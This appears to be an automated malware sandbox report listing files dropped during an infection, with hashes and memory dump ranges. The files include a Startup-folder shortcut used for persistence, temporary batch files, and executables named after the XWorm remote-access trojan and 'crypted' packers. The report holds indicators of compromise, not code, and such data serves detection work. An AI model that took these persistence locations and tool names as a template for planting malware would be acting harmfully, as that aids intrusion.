C:\Users\Admin\AppData\Local\Temp\Tmp3BE1.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/3376-363-0x0000000006AF0000-0x0000000006B66000-memory.dmp

memory/3376-364-0x0000000007140000-0x000000000715E000-memory.dmp

memory/3376-366-0x0000000007B50000-0x0000000008168000-memory.dmp

memory/3376-367-0x00000000076B0000-0x00000000077BA000-memory.dmp

memory/3376-368-0x00000000075F0000-0x0000000007602000-memory.dmp

memory/3376-369-0x0000000007650000-0x000000000768C000-memory.dmp

memory/3376-370-0x00000000077C0000-0x000000000780C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk

MD5 d2e8cb19d675dacf1389a68a3a45836c
SHA1 c29b7c2b58dbd1c5b06b20d13fe291f11769e0ad
SHA256 e93ac828159a1124479d259ab7fc4b63601e1545bdd80d5b70adb236a0560edb
SHA512 238761dbc74bb7c3c4080bd1e59c74da6e6ff678fc812141cadfd3d2018d1cf93eed1c3bca764f38ba8fa1742ccdbdb5cd46f16f57441e0392116ec3f09f9619

C:\Users\Admin\AppData\Local\Temp\WRW3jUfKERoW.bat

MD5 4e4b302b5c450e3f08ec0e65546339d4
SHA1 5a1ac3977bd6bbff15d149a1091f448f58e9b9b0
SHA256 8c536cdd7ffb3d06d2c13748d673945343dae83f38adf9b6e19a803ea1c1f06e
SHA512 3f88c6581ba80e27334d587c9adf95579342fc7b637f5f458f8ad02556b5fe58ab199e0623b2d952c3d898835a100836a71ff43559168f8091eb583a5d325e3f

memory/2372-387-0x0000000000400000-0x0000000000735000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6vc0q3VbwkxW.bat

MD5 8ee861dc546bbb1c73624bfd982ed6df
SHA1 cf015e8726c39e717eca223caec12d222132b8f1
SHA256 c03476bf289540c244be6a8e8e743c157d3d3638528834a5248e3d7ebfd7c6cd
SHA512 d45a2dc37260c42150de73b5457615cfb9e792f3460c5f7091e7ea6273a858b3d564c73c687c2eff265d4da124449ece860a94e57818fc976b36b47577aa3df0

memory/2372-399-0x0000000000400000-0x0000000000735000-memory.dmp

C:\Users\Admin\Desktop\Files\Client_protected.exe

MD5 19574d1c471ceaa99d0d05321e7beba4
SHA1 9c192eee06421e8a557b0afe0355545bae5366e6
SHA256 df606ef08b80c10d12a7372505f51e2641b263ded0280edcaf9085e7419b5f3e
SHA512 b73a16cd6f529cb8688b96f7039cfbca49c191b32b2240b56681125a4f8f63ceb625ae0077d1a845319f1a035524f314c95c3ef259cc7d284d7b557460db3244

memory/3084-415-0x00000000008B0000-0x0000000000F3E000-memory.dmp

memory/3084-418-0x00000000008B0000-0x0000000000F3E000-memory.dmp

memory/3084-419-0x00000000008B0000-0x0000000000F3E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\PdwGGa0lF9fa.bat

MD5 5783bbc276bf962a011ed5029948c8de
SHA1 d9e5580b98affc8155344b04207c4d9a2a311bf4
SHA256 f1617ed867ff81f00d332ea768e0317c457de2213a37397cd5b55f581e29c477
SHA512 1df96a225c1c499771a659f4b8273e80340bd38a99db53a75a0788b14254cb74231ff0939d4bbd5af7027327085f6c3506c992fecdf15822c5eb6199fcbb1bfe

memory/2372-430-0x0000000000400000-0x0000000000735000-memory.dmp

memory/3084-434-0x00000000008B0000-0x0000000000F3E000-memory.dmp

C:\Users\Admin\Desktop\a\filer.exe

MD5 9096f57fa44b8f20eebf2008a9598eec
SHA1 42128a72a214368618f5693df45b901232f80496
SHA256 f4e2eeea7e5db511bfca33ffd1e26bce5d72e2a381e84bf3700938eb404f7934
SHA512 ad29f94040532ab78679ec9e50d58d8ccef3f99d5ab53ef7c654527b9b2634da4c44375b2ca2d54a83d1dd1e0fa9b1d1a13241ffe0328bea07740166927521b2

C:\Users\Admin\Desktop\a\AmLzNi.exe

MD5 73507ed37d9fa2b2468f2a7077d6c682
SHA1 f4704970cedac462951aaf7cd11060885764fe21
SHA256 c33e3295dcb32888d000a2998628e82fd5b6d5ee3d7205ea246ac6357aa2bea6
SHA512 3a1031ce2daf62a054f41d226e9c9a0144ce746130db68737aaaa7930b148cbfbb99476c05504d6ebd4911f4e567ec1399005be7e64583caa636d7d94f5cd369

memory/2372-462-0x0000000000400000-0x0000000000735000-memory.dmp

memory/392-470-0x000001B596070000-0x000001B596092000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 57f919cd859abb1ef2bff85abeefcce4
SHA1 1d1331ba9485b10622cc498a03475445cdaf1eb3
SHA256 020807a7fd353e26e7773244edc05561c66d966536c7d14704a33f34896a275f
SHA512 9f0bbda5db8483b6559fb28d9ded1ec22c717f26fde6f34baf5dd483a1e556e749a5737c6a90422b9615c60b5258aaec4a6beda376926451ee5a57f359316c29

C:\Users\Admin\AppData\Local\Temp\1SiI4Zkx6p69.bat

MD5 aa9f725a8d55bdad824ba403493c5820
SHA1 08e26cde9f9d8de49a20969c3423626e129776e3
SHA256 45cbb04727d083de65e99e85567602b72121e5dec863bd7d53627ace9f99a83f
SHA512 f43e97fa4e756b7fdb7ff9fdb2f5e919a43c38679d2d8a5663d7895bed6a0a7f4ccb72d79dce35331de9381cce0f8855176132c478b71a274fd9d1eb5a2a58b8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ddfca02d5654e461612d188a94beeed5
SHA1 039ebb001a80ff78bbd7e4690bc2d6fe5f39f7a5
SHA256 8936ca7c447a89088498b0c5fbac6a594b05618ab6051a0f659451f46f90a5cb
SHA512 8a7da70bdae42da69ba6c2818dd12578c80f400e4e24c22aae42d0114c7d02353f2226442c179d695343ca40b80e4ed0cb30348f1af7b60377f786cb9825c0e4

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3eb3833f769dd890afc295b977eab4b4
SHA1 e857649b037939602c72ad003e5d3698695f436f
SHA256 c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512 c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

memory/392-498-0x000001B5AE740000-0x000001B5AE88F000-memory.dmp

memory/2300-497-0x0000017BC2A10000-0x0000017BC2B5F000-memory.dmp

memory/1004-510-0x000001ABF6920000-0x000001ABF6A6F000-memory.dmp

memory/3628-511-0x00007FF67B220000-0x00007FF67CC41000-memory.dmp

memory/2372-514-0x0000000000400000-0x0000000000735000-memory.dmp

memory/3628-519-0x00007FF67B220000-0x00007FF67CC41000-memory.dmp

memory/2372-520-0x00000000009E0000-0x0000000000A82000-memory.dmp

C:\Users\Admin\Desktop\Files\xxz.exe

MD5 deec0a7c5e6af53603b0171a0d7d5174
SHA1 15600a4e91ad83e4351c7a6a87e9102bb5998459
SHA256 df22795e42488daabc77eeb96f724ea6df453ed2ebcae81db03993b560ed5ab3
SHA512 e2809515a7ab66461144bcb746d16004df682cc93c92ee6874b876bc1307d62056ce780468ed179c782cf20027bfba4ca3867a04da6785e399eee0cbabeaf40a

memory/1724-535-0x000001C3C5970000-0x000001C3C5990000-memory.dmp

memory/2372-538-0x0000000000400000-0x0000000000735000-memory.dmp

C:\Users\Admin\Desktop\a\screenshot_0.png

MD5 2c2e819c7276db6c9cd361799587d713
SHA1 0629aeae87432b389ea90aa935975474fcb07dad
SHA256 a5c1ac87a7e352234c9012f0f321bc34c432c68cdb62d4a3f264825982f6dd55
SHA512 7d8164a1a31cb9ca4a5b0c4d9ee11326090578a530a3a82d87aceb09e3f798138e1fc932c2c0782cbb2027cf76d9783fe4b670ef07e7a6eef1685399410d578e

memory/2372-544-0x0000000000400000-0x0000000000735000-memory.dmp

C:\Windows\Debug\WIA\wiatrace.log

MD5 fa1da04151bfd4c8941cfef82ec29465
SHA1 4c10fea6737cbd1b76955358346b260485582fee
SHA256 564bd60d615949829fd903353b437a5c73bd2612c20eb1e4972377859911342f
SHA512 597a59f68e1a5d47ee787fc04d4c25af5948458ef60786a7f3a602922ff26ed928d84dc4394048b7da909df1e7ab175be8c674cd4e7f0fb3f3940b8062a45f49

C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe

MD5 3273f078f87cebc3b06e9202e3902b5c
SHA1 03b1971e04c8e67a32f38446bd8bfac41825f9cc
SHA256 4b6caa8467cf7ca3d7a3d3b2ac70e48510b7c4570e4810f3305aca1ef6cdf85c
SHA512 2a0bc7bf3ffd2f2e027e0feffb803f76dd11da48335e1b66a3c1927410e0a82c6ce212901c2ace9eca5bcce51eee49a12dc4619fc31711f0770e2d55ab7730f9

memory/4632-560-0x000001E6953A0000-0x000001E696288000-memory.dmp

C:\Users\Admin\Desktop\a\XClient.exe

MD5 ce69d13cb31832ebad71933900d35458
SHA1 e9cadfcd08d79a2624d4a5320187ae84cf6a0148
SHA256 9effe406fd302590314a9211fda92126ea6a7721d294c93fdf755b4cdfbd0bcf
SHA512 7993e79a9aeee679c9342d36fcb7624f1e7616db59eff10ff50d00e84bbbc5d9d7c154601f8a94bed7f25888f43f6f1922b87af31a582221e9022e6a8c3b1409

memory/652-573-0x00000000004E0000-0x00000000004EE000-memory.dmp

C:\Users\Admin\Desktop\a\333.exe

MD5 b73ecb016b35d5b7acb91125924525e5
SHA1 37fe45c0a85900d869a41f996dd19949f78c4ec4
SHA256 b3982e67820abc7b41818a7236232ce6de92689b76b6f152fab9ef302528566d
SHA512 0bea9890dbcd3afd2889d0e7c0f2746995169e7b424f58d4998c50bc49d2b37d30f5bd1845d3079b25f9963af2b71f136719cbd9fda37f7b85874992096b3e1d

memory/420-588-0x0000000036720000-0x0000000036730000-memory.dmp

C:\Users\Admin\Desktop\a\VBVEd6f.exe

MD5 4ea576c1e8f58201fd4219a86665eaa9
SHA1 efaf3759b04ee0216254cf07095d52b110c7361f
SHA256 d94206d9509cc47cae22c94d32658b31cf65c37b1b15ce035ffaa5ce5872ad2f
SHA512 0c7462bc590d06f0ead37246f189d4d56e1d62ff73f67bf7e2ce9c653d8c56812a5f1306fb504168f7e33b87485c3465ea921a36f1ba5b458d7763e45c649494

memory/2076-598-0x0000000000400000-0x000000000066D000-memory.dmp

C:\Users\Admin\Desktop\a\test12.exe

MD5 5853f8769e95540175f58667adea98b7
SHA1 3dcd1ad8f33b4f4a43fcb1191c66432d563e9831
SHA256 d58fee4abb20ce9214a9ed4ae8943a246a106bbe4f2b5332754c3b50ce7b0995
SHA512 c1393a51eea33279d86544c6c58b946ae909540a96edda07c19e21a24e55c51be34e45413aa5005e9aeedacbb7d38471027baa27c18dbc36a8359856da1a0d80

C:\Users\Admin\Desktop\a\test6.exe

MD5 6383ec21148f0fb71b679a3abf2a3fcc
SHA1 21cc58ccc2e024fbfb88f60c45e72f364129580f
SHA256 49bf8246643079a1ec3362f85d277ce13b3f78d8886c87ee8f5a76442290adde
SHA512 c6866039fc7964737cd225709930470e4efe08dc456b83b5b84d9f136c7d0734d2cce79f3b36c7c8e4b1559b2348c8fca981b2cce05f1c0b8f88ec7c7f532125

memory/1316-618-0x0000000000A30000-0x0000000000A84000-memory.dmp

C:\Users\Admin\Desktop\a\test14.exe

MD5 f299d1d0700fc944d8db8e69beb06ddd
SHA1 902814ffd67308ba74d89b9cbb08716eec823ead
SHA256 b105f79e0eac7079fc2998949eee28fb0bf7f9a08c4912477031ac8d7e897406
SHA512 6821e6e9393cbd8471a0403052ac4d4df6e14dc0955deabd7709331dcf537f3076c08003001eab34788d53cf03fd61878a4b31aa7879f862627b28110f43e2ca

memory/2452-628-0x0000000000970000-0x00000000009C4000-memory.dmp

memory/2452-629-0x0000000000CE0000-0x0000000000D41000-memory.dmp

memory/2452-630-0x0000000000080000-0x0000000000083000-memory.dmp

C:\Users\Admin\Desktop\Files\taskhost.exe

MD5 3296704171fe01c0fc4fcdd02f2695ca
SHA1 e0bd82f06d94c0e32d7f6bb9f80f57f8e73a84be
SHA256 b8c65f4588d2d9b76823e7ad22b71a3717792a505a4048314cb2ccba9a976e26
SHA512 8d1583be1930e1f819149a1a5b57ec5187b08eefe8dc306f6dc74506dd25c85a60b2b282c420060d1854c36fc8642f0754708fd87dd97ed19f2229c76334837b

C:\Users\Admin\Desktop\a\pantest.exe

MD5 312f2c6630bd8d72279c8998acbbbeba
SHA1 8f11b84bec24f586a74d1c48d759ee9ec4ad9d54
SHA256 706dccc82df58b5d49a8bcccc655a9dce0d47410bc922eb9a91108e5a1f82cfb
SHA512 ed7eba574b4d6a07c582148583ed0532293366d15b5091580c6ddf9a45ed78a185163b2b713e77957cd99b03353ea8f778c8de50075b9d2924358b431fc0b37d

memory/3356-648-0x0000000000A00000-0x0000000000A16000-memory.dmp

memory/3936-655-0x0000000000CA0000-0x0000000000CF4000-memory.dmp

C:\Users\Admin\Desktop\a\test9.exe

MD5 d399231f6b43ac031fd73874d0d3ef4d
SHA1 161b0acb5306d6b96a0eac17ba3bedb8c4a1b0f2
SHA256 520db0cc6b1c86d163dff2797dcbc5f78b968313bedea85f7530830c87e0287f
SHA512 b1d0b94b0b5bc65113a196276d0a983872885c4b59dd3473bcaa6c60f2051de4579a7bc41082a2016472a3ec7de8bcf3ac446e3f3cb27521327fe166284d3400

memory/2372-665-0x0000000000400000-0x0000000000735000-memory.dmp

memory/680-667-0x0000000000970000-0x00000000009C4000-memory.dmp

C:\Users\Admin\Desktop\a\test10-29.exe

MD5 6b0255a17854c56c3115bd72f7fc05bd
SHA1 0c5e1dfa655bcbb3ffad8e0e4471c41255de1dd5
SHA256 ce94cf176e146813c922782ded112003e45749cb07bb7c635241c1c39e54a36a
SHA512 fac0df5995a050653aa160e2e7fb8275b5c5471ce8fad9fee7c97beda37a96c27b1a3ff4de5b35e164378e3abed7df0998f6117aabb45e7eb46841e02617d1c1

C:\Users\Admin\Desktop\a\test19.exe

MD5 5a6d9e64bff4c52d04549bbbd708871a
SHA1 ae93e8daf6293c222aa806e34fb3a209e202b6c7
SHA256 c2c06c7b68f9ac079a8e2dcab3a28df987613ec94dbb0b507da838de830dcaa8
SHA512 97a2003e27257a4b4f2493b5f8e7d0d22ff539af4be3bc308fd2c3c3e0cff1bcbc222c26d8a01a1ccbf99d4c30403b464a8660dd340afe9d6d54b31651abf05a

C:\Users\Admin\Desktop\a\test10.exe

MD5 0f0e9f3b9a70d62ae4bc66a93b604146
SHA1 e516287a1a99aac6c296083a4545a6a6981a9352
SHA256 f38408d7e7dd4873930980fedfa841d515d3b4e12a7f33ba1d384c627186afda
SHA512 42940fc6103c07ee8d113fe46aff26d34cb53c8244bb60e1763efafb295ed7197133ef270dc0709641b8403aeee257119ed0492b0efcccf0607109f1e2112881

C:\Users\Admin\Desktop\a\test_again4.exe

MD5 b84e8b628bf7843026f4e5d8d22c3d4f
SHA1 12e1564ed9b706def7a6a37124436592e4ad0446
SHA256 b01b19c4d71f75f9ec295958a8d96a2639d995c20c133f4ffda2a2dabe8a7c28
SHA512 080aa4ad9094f142aa0eae3ae3d4bce59d61d8b5664d397268316f3c19fa4a7c161acf522adc8da5f6413a9327915f99ecdfe568b84300a9b31e42eb625ed0cd

C:\Users\Admin\Desktop\a\test23.exe

MD5 956ec5b6ad16f06c92104365a015d57c
SHA1 5c80aaed35c21d448173e10b27f87e1bfe31d1eb
SHA256 8c3924e850481889d5423eb7131833b4e828bf289d3f1eb327d491cb85a30d61
SHA512 443cd7b6763c1d9be3fbc061f015ba2298f664f70b908ae45e7db04019173a9288d6d30068300788a2bcd2aa694811094bfcb959e127fedb7da9cd042827e1d2

C:\Users\Admin\Desktop\a\test5.exe

MD5 c8ac43511b7c21df9d16f769b94bbb9d
SHA1 694cc5e3c446a3277539ac39694bfa2073be6308
SHA256 cb1eee26a7d2050feb980eccb69d35c05b5a0d28821972df19d974b386d9e4fe
SHA512 a9c7cf19857b9600e77d14d06c3774e38c6e04d2a72d119273216cc2ab9242b583b5ce5a6829fcf1e1553865088d628c82be827d8cc322e4e97c24a5ddc04628

C:\Users\Admin\Desktop\a\test11.exe

MD5 2340185f11edd4c5b4c250ce5b9a5612
SHA1 5a996c5a83fd678f9e2182a4f0a1b3ec7bc33727
SHA256 76ad6d0544c7c7942996e16fee6ef15aed4b8b75deb3c91551a64635d4455031
SHA512 34e863e001845e8117b896f565a020e70963b19d029b5e2bba89049be5eadae1abe06859a527bf29b86008a903c3879c63d680f9d1e1d264d238869cf14f232c

C:\Users\Admin\Desktop\a\test20.exe

MD5 153a52d152897da755d90de836a35ebf
SHA1 8ba5a2d33613fbafed2bb3218cf03b9c42377c26
SHA256 10591da797b93e3607264825685f76d6327f4463bf21953e66600abc6550b213
SHA512 3eb53a80e68efd134945b9e770166bad2147645bef7db41f585a7a1e9c7def45ff035bd91bad87b1daef3c6833c2f17a2c0fb33183a3c9327b40ccf59be45240

C:\Users\Admin\Desktop\a\test_again3.exe

MD5 e501f77ff093ce32a6e0f3f8d151ee55
SHA1 c330a4460aef5f034f147e606b5b0167fb160717
SHA256 9e808115bf83004226accb266fcbc6891f4c5bc7364d966e6f5de4717e6d8ed1
SHA512 845548058034136bb6204ae04efcb37c9e43187c2b357715fcfd9986614095a0fcf1e103ab8d9f566dedb34a033f9f30a346cbdf9ee2e262dd8a44d5eaf72af2

C:\Users\Admin\Desktop\a\test16.exe

MD5 9f88e470f85b5916800c763a876b53f2
SHA1 4559253e6df6a68a29eedd91751ce288e846ebc8
SHA256 0961766103f8747172f795b6cbf3c8ef06a1ded91fe49ff0f2f280cc326d1d9a
SHA512 c4fc712ed346c3c40f33f2514f556e92d915a6d0257fdd8d174b3f87f8c34a9167cfaca58785b52b68a5e5c710656a6269e5d0e20eef7f63a6d06f658d53fb5d

C:\Users\Admin\Desktop\a\test13.exe

MD5 44c1c57c236ef57ef2aebc6cea3b3928
SHA1 e7135714eee31f96c3d469ad5589979944d7c522
SHA256 4c3618c90ca8fac313a7868778af190a3c22c8c03132505283b213da19ce9b7f
SHA512 99d0a428082d19bb28327698e8a06f78eee5a23134f037a4357c1ac4a6c9bb7d6ad454f28a2a546e8c7770423c64d6d951a074cd40711bc1bdcd40e59919934d

C:\Users\Admin\Desktop\a\test_again2.exe

MD5 52a2fc805aa8e8610249c299962139ed
SHA1 ab3c1f46b749a3ef8ad56ead443e26cde775d57d
SHA256 4801ead85ca08f439f695f198f5a87032c688143b3fe679b2b0872102c0d58ea
SHA512 2e6897092f3e25da023b003975f2fa5f45a4a2a115bc56460d15b21933da517fd7e1e98dcdad49196236614a516c710c19f4bfd4603776b620eb6d9c31c02cdf

C:\Users\Admin\Desktop\a\test15.exe

MD5 80e217c22855e1a2d177dde387a9568f
SHA1 c136d098fcd40d76334327dc30264159fd8683f8
SHA256 0ef39ccad2c162a5ab7dc13be3bba8f898fb38ba2f7357e840bd97456537decd
SHA512 6f658863ee676a07df7bbfc7b8a60bc591a6e8bf21c6f7147772e0b9beb223310c32da7436c202a4e804ce9e32128ec360618c3b273105e0f948d72859adc686

C:\Users\Admin\Desktop\a\test18.exe

MD5 a694c5303aa1ce8654670ff61ffda800
SHA1 0dbc8ebd8b9dd827114203c3855db80cf40e57c0
SHA256 994d0670d75433df8e0f2cce833d19d3045d3527143ce2ccf4cb4c04d4157a62
SHA512 b15856b54a018a71e71637e47e00b1c64154e24ae4c2a671dca25c43bccf4bbbf9da4445b6a7d48f62cab7da06c30fdd884d4bba21c5929a9569db0a288d9d9a

C:\Users\Admin\Desktop\a\test21.exe

MD5 3b8e201599a25cb0c463b15b8cae40a3
SHA1 4a7ed64c4e1a52afbd21b1e30c31cb504b596710
SHA256 407f4efed0f09c97d226da99b030bf628fcd9a2f8ee1416c1f4f1bd482d372a8
SHA512 fb5af97c3b5784ebdd3988179e970d9462aec283a41301f50f3cf31537538cef5e7534c6bb44b28ab5e1807ac85afb9490b6c30014ce9eb207030c3096921ac7

C:\Users\Admin\Desktop\a\test22.exe

MD5 e1c3d67db03d2fa62b67e6bc6038c515
SHA1 334667884743a3f68a03c20d43c5413c5ada757c
SHA256 4ab79ee78e0abe5fff031d06a11f1de1a9e0c935097e1b829ad3e8b077700936
SHA512 100c775bcf6ce70a82cb18884e1ca50f3cdd0be1b9f4f835e6c41c9820ff42c4fe3ca3d1fdc41d4f2e0f26dda5e5b85b3f555b88f11b58c5e81267706cafa3d7

C:\Users\Admin\Desktop\a\test8.exe

MD5 cae51fb5013ed684a11d68d9f091e750
SHA1 28842863733c99a13b88afeb13408632f559b190
SHA256 67256a1f764ec403d8a1bcb009e701069b815db72869eae0b59dab1f23ebc8e8
SHA512 492961ea16f34bafa9e8695eeffef94cc649e29d7ad9da8c02b4bc49c33878cf9d75d6cdb69f7ad6713f6e5296750bd52dc08b70cd6e6c0ad963de6ca87f0ec6

C:\Users\Admin\Desktop\a\test7.exe

MD5 2734a0771dc77ea25329ace845b85177
SHA1 3108d452705ea5d29509b9ffd301e38063ca6885
SHA256 29cfae62adef19cd2adf20e32908289270ebd3bdd52b407818b8f641bfb1314a
SHA512 c400274d6682ad4dfae87fa53a272f3210262e083d6a966ce49711438b8e3a49ff0110e0d2b18007db8bbab54b8f8e4f0e18ba579a0f33b470e14324c3bc637b

C:\Users\Admin\Desktop\a\test-again.exe

MD5 d9fd5136b6c954359e8960d0348dbd58
SHA1 44800a8d776fd6de3e4246a559a5c2ac57c12eeb
SHA256 55eb3a38362b44d13ae622cc81df37d1d7089c15f6608fd46543df395569e816
SHA512 86add0c5fd4d7eff19ce3828c2fe8501d51566cad047d7e480acf3e0bc227e3bda6a27aa65f7b2fd77d34cd009de73c98014d0323d8cf35ba06e5451eee5e9b0

C:\Users\Admin\Desktop\a\test17.exe

MD5 c821b813e6a0224497dada72142f2194
SHA1 48f77776e5956d629363e61e16b9966608c3d8ff
SHA256 bc9e52cd6651508e4128eb5cc7cab11825b0cb34d55d8db47b2689c770c1b0b1
SHA512 eab0164d5946a04e63dc05f26c4ed27d8fff36019a0faf46f8a548e304a5525a474eee37cb655600ac95bb16535cf74417056e931adff36c09203a192d83c676

C:\Users\Admin\Desktop\a\vg9qcBa.exe

MD5 20160349422aeb131ed9da71a82eb7ab
SHA1 bb01e4225a1e1797c9b5858d0edf063d5f8bc44f
SHA256 d8f6ce51eba058276c4722747655b68711682afc5654414e8c195ada38fdc0ea
SHA512 907f3f61ac9ebeda534b3a330fd8673e8d09b243847b6a7a8d8d30f74ba8c699eafb8338a8d4f36824871609c1f226cb4db1e4a931fdf312f0e4331e7110c6b8

C:\Users\Admin\Desktop\Files\LoadNew.exe

MD5 414753e6caa05ca4a49546cec841ef10
SHA1 998c0b4533f3e00eeacf441fbe29575198a574d4
SHA256 5b9ed73fd7af6b0f9625ff30b925c84905e76b694a37e41d6207626b2fc3d2f6
SHA512 c6f1476229c6587d7209455cbba42f1eb44b72b14842a60b446ab8252330c3f47d332f95645136493dfe07f8f00e4064bf6f789149e9dec0807024f5effdf4a7

C:\Users\Admin\Desktop\Files\OneDrive.exe

MD5 1b99f0bf9216a89b8320e63cbd18a292
SHA1 6a199cb43cb4f808183918ddb6eadc760f7cb680
SHA256 5275e3db6276e5f0b85eff0c7b0282f56268646766b1566ba8f797e6ba2a9357
SHA512 02b7f410c6ccfd7d43159287424916a310b7e82c91cdb85eaeade16cf5614265a8bdcce8e6dcc2240ea54930cfb190f26ada3d5c926b50617a9826197f9cf382

memory/5144-982-0x0000026109E10000-0x0000026109F5A000-memory.dmp

memory/5144-983-0x0000026124FC0000-0x00000261250C6000-memory.dmp

C:\Users\Admin\Desktop\Files\Armanivenntii_crypted_EASY.exe

MD5 795197155ca03f53eed7d90a2613d2a7
SHA1 e177b0c729b18f21473df6decd20076a536e4e05
SHA256 9a28b8f494f4f89738766b98f51242ceb5e2207175db7f6682e729451c83fdcf
SHA512 4aff1b1d26b5d3389d8deb0b9b428f4e81daa9d530e37cb3064d33c243407dbf73a218367ba4fa2138b068fc40b5588d5d4ae4849a921ea5e407ad4d3610084b

memory/5144-2079-0x00000261243F0000-0x0000026124470000-memory.dmp

memory/5144-2080-0x0000026124320000-0x000002612436C000-memory.dmp

memory/1084-2081-0x00000000009F0000-0x0000000000A92000-memory.dmp

C:\Users\Admin\Desktop\Files\25072023.exe

MD5 a9a37926c6d3ab63e00b12760fae1e73
SHA1 944d6044e111bbad742d06852c3ed2945dc9e051
SHA256 27955c80c620c31df686ccd2a92bce1d07e97c16fda6bd141812e9b0bdd7b06b
SHA512 575485d1c53b1bf145c7385940423b16089cf9ab75404e2e9c7af42b594480470f0e28dadcddbd66e4cd469e45326a6eb4eb2362ccc37edb2a956d224e04cf97

memory/5724-2109-0x0000000000C70000-0x0000000000CC2000-memory.dmp

C:\Users\Admin\Desktop\Files\PctOccurred.exe

MD5 31f04226973fdade2e7232918f11e5da
SHA1 ff19422e7095cb81c10f6e067d483429e25937df
SHA256 007c6dfe4466894d678c06e6b30df77225450225ddd8e904e731cab32e82c512
SHA512 42198fc375993a09da3c8a2766ee6831cf52ff8cd60b3eb4256a361afa6963f64a0aff49adb87c3b22950e03c8ef58a94655959771f8d2d5b754012706220f66

C:\Users\Admin\Desktop\Files\crypted8888.exe

MD5 031836b5b4c2fc0ba30f29e8a936b24e
SHA1 adc7e7ec27f548afd50fac684c009cfe5c2e0090
SHA256 bf4f27f6932ce75b1746f5364af3abacbdafa59913da513a168d86ea0ad3a3a4
SHA512 ac58ed6b9a3ce4c35366e99e72e4ee1c87048a11979c91f69740d49b3c1f4f4dc3cbaa66287c73530806b8359933e7b6df0bbab01bc3dd4f351988a6a3cd3b6d

memory/6776-2171-0x00000000004C0000-0x00000000004F8000-memory.dmp

C:\Users\Admin\Desktop\a\win.exe

MD5 73e0321f95791e8e56b6ae34dd83a198
SHA1 b1e794bb80680aa020f9d4769962c7b6b18cf22b
SHA256 cae686852a33b1f53cdb4a8e69323a1da42b5b8ac3dd119780959a981305466b
SHA512 cc7b0ddf8fdb779c64b4f9f8886be203efb639c5cad12e66434e98f7f8ac675aee1c893014d8c2a36761504b8b20b038a71413934b8bc8229fdde4f13c8d47bc

C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe

MD5 569720e2c07b1d34bac1366bf2b1c97a
SHA1 d0c7109e04b413f735bf034ce2cb2f8ee9daa837
SHA256 0df79273aea792b72c2218a616b36324e31aaf7da59271969a23a0c392f58451
SHA512 fa83ba4e0b1fa1f746e0ff94cb8f6e4ed9c841c66cc661c6fd28d30919ae657425fe0bb77319cf328a457600e364147c6e9d9140548a068a18a7e2ca0a3a2436

C:\Users\Admin\Desktop\a\x4lburt.exe

MD5 96a7b754ca8e8f35ae9e2b88b9f25658
SHA1 ed24a27a726b87c1d5bf1da60527e5801603bb8e
SHA256 21d262741b3661b4bf1569f744dc5b5e6119cfa4f0748b9c0fa240f75442cc50
SHA512 facb2e44f5a506349710e9b2d29f6664357d057444a6bd994cf3901dee7bea471247b47496cc4480f1ad2fac4b1867117072ea7a0bfa83d55ced4e00dda96745

memory/6384-2245-0x0000000000830000-0x0000000000956000-memory.dmp

memory/6384-2246-0x0000000004EC0000-0x0000000004EE6000-memory.dmp

memory/5144-2301-0x0000026125420000-0x0000026125474000-memory.dmp

memory/5144-2304-0x00000261256F0000-0x000002612571C000-memory.dmp

C:\Users\Admin\Desktop\Files\postbox.exe

MD5 c53bb047b93851b66fead144d7c46ff3
SHA1 42ef9d0a7efe477fabd290d16c30c63f5f576cd1
SHA256 54092d2fb30f9258ab9817de3b886997dbefdee2963b4d051b70c0309aea99e6
SHA512 7060e10d60d0699c7c06012a3e2be44f859ec06ec00bbd51331b5ac5169e88d14baf7949d2cd40bcebe42016f8a7d5a28a11c755a54675f5715dbee34cfc11a6

memory/5144-2395-0x0000026123B10000-0x0000026123B1E000-memory.dmp

memory/5144-2396-0x0000026123B20000-0x0000026123B2E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuwhzy.exe

MD5 299dfc974181983f70d3197318849008
SHA1 913085466ab9a0ce2930017a395afab47cee817f
SHA256 760aa9c67bc1e2339e26a884bad88256e263c3762d8ca5d3c967bcc959635a1b
SHA512 2c53cbc0f296eaa1dc85b8cdf504863656d7f9707c44b2c65785a007beb609db270707e3b8059dac2d173892bd293521f5e0698b8f5353bdc9630dab1c091984

C:\Users\Admin\AppData\Local\Temp\iazsfn.exe

MD5 695d3e9e795bc4164a7f0de0f066b7aa
SHA1 704b380393e1726c1a8382c7c0b0c2162d52e8db
SHA256 12e05a6a44e880f6d6816742ea5486d1fae93a63449a4cea07467ae5222b5f4c
SHA512 9d077c6ba9b153622dcd13d021e770920aaca038bdca307dd32fefeb388af46348bdb357916bed0f6e260960ad8edafc5ba942bdf5cd2dee90b2892f8169361a

memory/5920-2420-0x0000000000B30000-0x0000000000B58000-memory.dmp

memory/6044-2422-0x0000000000030000-0x00000000005B4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Updater.vbs

MD5 a4e919451b35d793876fc4342a084d1d
SHA1 b543601da91bdd3025a4e7e62f6d2760ce72256e
SHA256 686b9602f1fba6bdd076bd6faeb9bc1d37fb03ac45ba3f7ed2e44e47a50c02a2
SHA512 2d6ffe66f152ae89bddae8f705430f8c540b89e3e6d4dccfbc345b68e170cc8f3134da873ff8b76e83ab1b30f63605595d73a502a66ababd1cf4bfa881804a35

memory/5144-2442-0x0000026123B60000-0x0000026123C80000-memory.dmp

